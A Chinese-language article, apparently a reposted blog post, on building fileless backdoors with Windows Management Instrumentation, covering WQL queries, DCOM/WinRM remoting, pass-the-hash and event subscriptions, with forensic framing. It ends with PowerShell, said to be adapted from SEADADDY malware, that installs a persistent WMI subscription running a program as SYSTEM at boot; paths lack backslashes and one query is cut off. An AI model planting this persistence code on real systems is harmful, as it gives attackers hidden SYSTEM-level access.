如何利用WMI构建无文件后门


这篇文章将为大家详细讲解有关如何利用WMI构建无文件后门,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。随着技术的更新换代,很多技术在Windows系统中被引进和弃用,但是有一种非常强大的技术却保留了下来,自Windows NT 4.0和Windows 95开始就一直延续下来,那就是Windows Management Instrumentation (WMI),即Windows管理工具。现在所有的Windows系统中都有这个工具,利用它包含的工具集,我们可以管理本地或远程的计算机。它不仅仅被系统管理员熟知,更因为Stuxnet利用WMI来进行攻击的原因而被广大安全人员所知。由于WMI能够提供系统信息收集,防病毒检测,代码执行,横向移动,持久化和盗取数据的能力而很受黑客的欢迎。随着黑客越来越多的使用WMI技术,了解WMI知识并为已所用,对防御者来说就非常重要。这个文章主要向读者介绍WMI的主要功能,攻击者如何使用WMI,如何通过WMI绕过IDS以及如何通过WMI Repository做取证。WMI是Windows对WBEMCID标准的实现。两个标准目的是在企业环境中提供一个行业无关的,用于收集和传输Managed Component(管理组件)信息的方法。
一个WMI的管理组件可以是一个进程,一个注册表的键,一个安装的服务或一个文件信息,等等。这些标准用来沟通确定实现者应该使用什么方法来query(查询),populate(填充),structure(构造),transmit(传输),perform actions on(执行操作)和consume data(处理数据)。
管理组件即WMI的对象,是代表着高度结构化的操作系统数据的Class Instances(类实例)。Microsoft提供了非常多的WMI对象来提供有关系统的信息,比如Win32_ProcessWin32_ServiceAntiVirusProductWin32_StartupCommand等。Microsoft提供了一些用来处理WMI数据和执行WMI命令的方法。例如,PowerShell提供给了我们一个非常简单的与PowerShell交互的方式。所有的WMI对象可以通过一个叫WQL的查询语言来查询,这种语言与SQL相似,能够让我们精细地控制返回给用户的WMI对象。当用户请求一个WMI对象时,WMI服务(Winmgmt)需要知道请求对象的数据填充方式。这个功能是通过WMI Providers(WMI提供者)来完成的。一个WMI提供者就是一个在注册表中拥有相关GUID的注册表键。WMI提供者在数据填充时,做了大量的动作,比如查询所有进程,枚举注册表键等。当WMI服务填充一个WMI对象时,会有两种类实例:Dynamic Object(动态对象)和Persistent Object(永久化对象)。
动态对象是在进行查询时生成的,例如,Win32_Process就是一个动态对象。
永久化对象是存储在CIM Repository(CIM库)中的,默认放在%SystemRoot%System32wbemRepositoryOBJECTS.DATA中。WMI对象大部分的结构是通过Managed Object Format (MOF)(管理对象格式)文件中描述的。MOF文件使用类似C++的语法来描述WMI对象。
当WMI提供者生成原始数据时,MOF文件对提供了这些数据的构造结构。从防御者的角度看,值得注意的是,WMI对象的定义可以不通过MOF文件,攻击者可以通过在CIM库中插入.Net代码来定义。Microsoft提供了两种用于远程传输WMI数据的方法:DCOMWindows Remote Management (WinRM)。一些WMI对象包含一些可执行的方法/函数。例如,Win32_Process类的静态函数Create就经常被黑客用来做内网中的横向移动。
WMI还提供了一个Eventing System(事件系统),用户可以注册在WMI对象生成,修改或删除时执行的事件处理程序。操作系统信息是通过WMI对象的方式表示的。一个WMI对象也就是一个WMI类的实例。大多数常用的WMI类在MSDN中都有详细的描述,如Win32_Process类。然而还有很多WMI类并没有文档可查,但是幸运的是,我们可以通过WQL来查询所有的WMI类。与传统的面向对象编程语言相似,WMI类被分类分层的放在命名空间中。所有的命名空间都是从ROOT命名空间下的,当不指定命名空间进行查询时,Microsoft会使用ROOTCIMV2作为默认的命名空间。所有的WMI设置,包括默认命名空间在下面的注册表键中:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEM下面的PowerShell代码会递归查询所有的WMI类及其命名空间:function Get-WmiNamespace { Param ($Namespace='ROOT')
Get-WmiObject -Namespace $Namespace -Class __NAMESPACE | ForEach-Object { ($ns = '{0}{1}' -f $_.__NAMESPACE, $_.Name) Get-WmiNamespace -Namespace $ns }}
$WmiClasses = Get-WmiNamespace | ForEach-Object { $Namespace = $_ Get-WmiObject -Namespace $Namespace -List | ForEach-Object { $_.Path.Path }} | Sort-Object -Unique返回的WMI Class 路径如下:...WIN-Q4UUJ0BPKL9ROOTCIMV2:__AbsoluteTimerInstructionWIN-Q4UUJ0BPKL9ROOTCIMV2:__ACEWIN-Q4UUJ0BPKL9ROOTCIMV2:__AggregateEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__ClassCreationEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__ClassDeletionEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__ClassModificationEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__ClassOperationEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__ClassProviderRegistrationWIN-Q4UUJ0BPKL9ROOTCIMV2:__ConsumerFailureEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__EventWIN-Q4UUJ0BPKL9ROOTCIMV2:__EventConsumerWIN-Q4UUJ0BPKL9ROOTCIMV2:__EventConsumerProviderRegistrationWIN-Q4UUJ0BPKL9ROOTCIMV2:__EventDroppedEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__EventFilterWIN-Q4UUJ0BPKL9ROOTCIMV2:__EventGeneratorWIN-Q4UUJ0BPKL9ROOTCIMV2:__EventProviderRegistrationWIN-Q4UUJ0BPKL9ROOTCIMV免费云主机域名2:__EventQueueOverflowEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__ExtendedStatusWIN-Q4UUJ0BPKL9ROOTCIMV2:__ExtrinsicEventWIN-Q4UUJ0BPKL9ROOTCIMV2:__FilterToConsumerBindingWIN-Q4UUJ0BPKL9ROOTCIMV2:__IndicationRelatedWIN-Q4UUJ0BPKL9ROOTCIMV2:__InstanceCreationEvent...WMI提供了一种非常直观的语法用来查询WMI对象的实例,类和命名空间,即WQL。WQL查询通常可以分为以下几类:Instance Queries(实例查询):查询WMI对象实例。Event Queries(事件查询):等同于在WMI对象创建/修改/删除的时候注册一个消息。Meta Queries(元查询):元查询用来获取WMI命名空间和类结构的元信息。这是最常用的WQL查询。基本的格式如下:SELECT [Class property name | *] FROM [CLASS NAME] 例如,下面的查询语句将返回所有可执行文件名中带有chrome的正在运行的进程:SELECT * FROM Win32_Process WHERE Name LIKE "%chrome%"事件查询被用作一种消息机制来监听事件类的触发。通常用来在一个WMI对象实例创建/修改/删除的时候给用户发送一个消息。根据消息类型是intrinsic(系统自带的)还是extrinsic(第三方的),查询语句格式不同:SELECT [Class property name | *] FROM [INTRINSIC CLASS NAME] WITHIN [POLLING INTERVAL] SELECT [Class property name | *] FROM [EXTRINSIC CLASS NAME] 下面的查询将在用户登录的时候被执行:
SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstanceISA 'Win32_LogonSession' AND TargetInstance.LogonType=2下面的查询将在用户插入可移除设备时被执行:
SELECT * FROM Win32_VolumeChangeEvent Where EventType=2元查询用来查询WMI命名空间和类结构的信息。最常见的用法是用来列举WMI命名空间的类结构。元查询是实例查询的一个子集,但是与对象查询不同的是,我们查询的是类的实例的定义。格式如下:SELECT [Class property name | *] FROM [Meta_Class | SYSTEM CLASS NAME] 下面这个语句会查询所有以WIN32开头的WMI的类:SELECT * FROM Meta_Class WHERE __CLASS LIKE "Win32%"下面这个语句会查询某个命名空间下的所有命名空间:SELECT Name FROM __NAMESPACE注意,当不显示的指定命名空间时,默认的命名空间为ROOTCIMV2。Microsoft和一些第三方软件开发者为我们提供了许多能够与WMI交互的工具。下面是部分工具的一个不完全的列表:PowerShell是一个非常强大的脚本语言,其中包含很多能够与WMI进行交互的功能。对于PowerShell v3版本来说,有如下:Get-WmiObjectGet-CimAssociatedInstanceGet-CimClassGet-CimInstanceGet-CimSessionSet-WmiInstanceSet-CimInstanceInvoke-WmiMethodInvoke-CimMethodNew-CimInstanceNew-CimSessionNew-CimSessionOptionRegister-CimIndicationEventRegister-WmiEventRemove-CimInstanceRemove-WmiObjectRemove-CimSessionWMI命令和CIM命令的功能相似,但是在v3版本的PowerShell中,CIM更加的灵活。使用CIM命令最大的好处就是它们可以在WinRMDCOM协议下工作,而WMI命令只支持DCOM协议。从攻击者的角度看,专门用来创建/修改/删除WMI/CIM类的命令是不存在的。但是,使用WMI可以很容易的创建WMI类。
这篇文章的例子中将主要使用PowerShell,因为它的灵活性,并且攻击者越来越多的使用它。wmic.exe是一款非常强大的用来与WMI交互的命令行工具。它有非常多而且方便的WMI对象的别名可使用,可以用来进行更加复杂的查询。
wmic.exe还能够执行WMI方法,攻击者在做内网横向移动时,用的就是Win32_Process的Create方法。但是有一个限制就是,我们不能执行一个接受内置WMI对象的方法。如果PowerShell不可用,用wmic.exe来做系统信息收集和执行一些基本操作还是可以的,它也是常常被渗透测试员和攻击者使用。wbemtest.ext是一款强大的图形化工具,是出于诊断工具来设计的。可以用来枚举对象实例,执行查询,注册事件,修改WMI对象和类,本地或远程执行。虽然界面不是非常友好,但是对攻击者来说,在其他工具无法使用时,这个工具还是不错的。
WMI Explorer是Sapien公司开发的一款商业工具,用来查找WMI类。它拥有非常好的界面,并且可以分层浏览WMI库。它不可以连接远程WMI库并执行查询。CIM Studio是免费的,来自Microsoft,可以用它方便的浏览WMI库,用来查找WMI类也是不错的。VBScriptJScript,虽然Microsoft提供的这两个脚本语言名声不太好,但是就与WMI交互功能来说,它们还是很强大的。事实上,有一个完整的后门程序就是使用这两种脚本语言开发的,其中使用WMI功能完成了基本的C2 (Command and Control)机制。
另外,稍后我们会详细介绍,Event Consumer(事件处理)接口ActiveScriptEventConsumer,只有这两种脚本语言,而这个接口对攻击者和防御者来说都很有价值。
不管怎样,在那些没有PowerShell环境的老系统中,VBScript和JScript还是霸主地位。请自行查看COM API for WMI。如果想详细分析包含WMI功能的恶意软件的话,这个接口对逆向工程师来说也很重要。.NET 类库在System.Management命名空间下提供了几个用于与WMI交互的类,使用C#等语言编写起来也很简单。在下面的例子中,这些类会在PowerShell代码中反复使用。winrm.exe可以在本地或远程开启WinRM服务的机器上枚举WMI对象实例,调用方法,创建和删除对象实例。winrm.exe也可用来配置WinRM服务。与WMI交互的理想方法是使用CIM命令的PowerShell,但是这个可以作为替代方法。winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe";CurrentDirectory="C:"}winrm enumerate http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Processwinrm get http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_OperatingSystemwmic是一个用来执行WMI查询的简单的Linux命令行工具,可远程调用Win32_Process的Create方法。wmis还接收NTML哈希。WMI的强大体现在通过远程操作的时候。目前,WMI支持两种协议:DCOMWinRM,使用这两种协议可以做任何事情,包括查询对象,注册事件和执行WMI类的方法,等等。两种协议都对攻击者有利,因为防御者通常不会检查这两种协议的恶意流量。利用WMI所需的东西就是可用的有权限的用户凭证。在Linux平台上的wmis-pth工具中,只需要提供被攻击者的用户哈希即可。从WMI被引入的时候起,DCOM就被当作默认协议。DCOM通过135端口建立TCP连接,后续的数据交换则通过随机选择的TCP端口传输。这个端口可以通过dcomcnfg.exe进行配置和修改,其最终是改动如下注册表项:HKEY_LOCAL_MACHINESoftwareMicrosoftRpcInternet - Ports (REG_MULTI_SZ)所有的PowerShell中内置的WMI命令都使用DCOM协议。PS C:UsersMichaelDesktop> Get-WmiObject -Class Win32_Process -ComputerName WIN-Q4UUJ0BPKL9 -Credential 'WIN-Q4UUJ0BPKL9Administrator'近来,WinRM已经超过了DCOM,被Windows当作建议使用的协议。WinRM基于Web Services-Management (WSMan)规范,是一个SOAP-based设备管理协议。另外,PowerShell Remoting也是基于WinRM规范的,这使得我们能够通过PowerShell在大规模Windows企业环境中实现强大的远程管理功能。WinRM同样支持WMI,或者说CIM的网络操作。默认情况下,WinRM服务开启并监听5985/tcp端口,而且默认是加密的。还可以通过配置证书的方式在5986/tcp端口实现HTTPS支持。通过GPO,winrm.exe和PowerShell的WSMan虚拟盘符,我们可以很方便的配置WinRM。PS C:UsersMichaelDesktop> ls WSMan:localhost
WSManConfig: Microsoft.WSMan.ManagementWSMan::localhost
Type Name SourceOfValue Value---- ---- ------------- -----System.String MaxEnvelopeSizekb 500System.String MaxTimeoutms 60000System.String MaxBatchItems 32000System.String MaxProviderRequests 4294967295Container ClientContainer ServiceContainer ShellContainer ListenerContainer PluginContainer ClientCertificatePowerShell提供了方便的命令去检测WinRM服务是否处于监听状态——Test-WSMan
如果Test-WSMan有返回结果,则说明WinRM服务正常,而且这个命令不需要传入认证信息。PS C:UsersMichael> Test-WSMan -ComputerName WIN-JF74R0AP7LN

wsmid : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsdProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsdProductVendor : Microsoft CorporationProductVersion : OS: 0.0.0 SP: 0.0 Stack: 3.0如果要与运行着WinRM服务的系统的WMI进行远程交互,可用命令有两个:winrm.exe和PowerShell的CIM命令
PS C:UsersMichael> $s = New-CimSession -ComputerName win -Credential 'winMichael' -Authentication NegotiatePS C:UsersMichael> Get-CimInstance -CimSession $s -ClassName Win32_Process
ProcessId Name HandleCount WorkingSetSize VirtualSize PSComputerName--------- ---- ----------- -------------- ----------- --------------0 System Idle P... 0 24576 0 win4 System 545 839680 4771840 win244 smss.exe 29 1056768 5234688 win332 csrss.exe 664 4886528 97574912 win372 wininit.exe 76 4255744 45420544 win380 csrss.exe 290 15814656 168321024 win...3528 SGTool.exe 323 21172224 180084736 win2808 WmiApSrv.exe 121 6074368 32092160 win对攻击者和防御者都非常强大的一个功能是,WMI拥有异步响应WMI事件的能力。加上适当的异常处理,WMI事件基本可以用来响应所有的操作系统事件。WMI事件分两类,包括运行在本地上下文环境当中的单个进程的事件和永久性WMI事件订阅。(There are two classes of WMI events – those that run locally in the context of a single process and permanent WMI event subscriptions.)
本地事件有生命周期为进程宿主的周期,而永久性WMI事件是存储在WMI库中,以SYSTEM权限运行,并且重启后依然存在。为了能够安装一个永久性的WMI事件订阅,必须满足三个条件:一个事件过滤器一个事件处理:代表一个事件触发时启动的动作一个处理绑定的过滤器:代表将一个过滤器绑定到一个事件处理的注册机制一个事件过滤器接收一个WMI事件查询参数,并保存到ROOTsubscription:__EventFilter对象的一个实例中。
事件过滤器支持以下类型的查询:Intrinsic Events在当一个WMI类或对象创建,修改,删除的时候被触发,用来传递信息给启动计时器或要执行的WMI方法,下面的这个Intrinsic Events在所有的WMI命名空间中都有,并以系统类的形式命名(以两个下划线开头):__NamespaceOperationEvent__NamespaceModificationEvent__NamespaceDeletionEvent__NamespaceCreationEvent__ClassOperationEvent__ClassDeletionEvent__ClassModificationEvent__ClassCreationEvent__InstanceOperationEvent__InstanceCreationEvent__MethodIvocationEvent__InstanceModificationEvent__InstanceDeletionEvent__TimerEvent这些事件都非常强大,因为它们可以用来触发你能想象到的任何的操作系统事件。例如,一个人可以通过下面的命名在用户登陆时触发一个事件:
SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType=2上面的查询的意思是,在一个登陆类型为2(交互式登陆)的Win32_LogonSession类的实例创建时,触发一个事件。由于特定Intrinsic Event的调用时间不同,我们必须在查询中指定一个Polling Interval(时间间隔),也就是说,偶尔我们会触发不了这样的事件。比如一个事件查询的目标是一个WMI类实例的创建,如果这个实例在我们指定的时间间隔内生成并销毁了,那么这个事件将不会被查询到。Extrinsic Events解决了Intrinsic Events的时间间隔的问题,因为当一个事件发生时,一个Extrinsic Event就立即被触发了,但劣势是当前的WMI中的Extrinsic Events并不多,不过现有有这些也很强大了:ROOTCIMV2:Win32_ComputerShutdownEventROOTCIMV2:Win32_ProcessStartTraceROOTCIMV2:Win32_ModuleLoadTraceROOTCIMV2:Win32_ThreadStartTraceROOTCIMV2:Win32_VolumnChangeEventROOTDEFAULT:Msft_WmiProvider*ROOTDEFAULT:RegistryKeyChangeEventROOTDEFAULT:RegistryValueChangeEvent下面的命令可以查询到用户态和内核态下每个进程的所有模块:
SELECT * FROM Win32_ModuleLoadTrace一个Event Consumer代表当一个事件触发时进行的操作。可用的标准事件处理类:LogFileEventConsumer: 将事件数据写入到指定的日志文件ActiveScriptEventConsumer: 用来执行VBScript/JScript程序NTEventLogEventConsumer:创建一个包含事件数据的日志入口点SMTPEventConsumer:将事件数据用邮件发送CommandLineEventConsumer:执行一条命令可以想象到,ActiveScriptEventConsumer和CommandLineEventConsumer类应该是攻击者处理事件时使用最频繁的。这两个事件处理类给攻击都提供了一种无文件式的执行任意代码的灵活性。所有的事件处理类都在从__EventConsumer类继承而来的。下面的PowerShell代码来自一个叫SEADADDY的恶意软件的修改版,用来通过WMI做持久化的。其中,事件过滤是从PowerSploit的持久化模块,用于在系统启动时触发,事件处理则以SYSTEM权限执行一个程序。$filterName = 'BotFilter82'$consumerName = 'BotConsumer23'$exePath = 'C:WindowsSystem32evil.exe'$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=200 AND TargetInstance.SystemUpTime $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "rootsubscription" -Arguments @{Name=$filterName;EventNameSpace="rootcimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "rootsubscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "rootsubscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}关于如何利用WMI构建无文件后门就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

相关推荐: 解决https证书错误修复的方法

不懂解决https证书错误修复的方法?其实想解决这个问题也不难,下面让小编带着大家一起学习怎么去解决,希望大家阅读完这篇文章后大所收获。一、注册https证书安全吗大家如果在使用计算机的时候浏览器提示注册https安全证书吗,这个问题我们肯定是网站不安全了,可…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

Like (0)
Donate 微信扫一扫 微信扫一扫
Previous 02/06 10:16
Next 02/06 10:18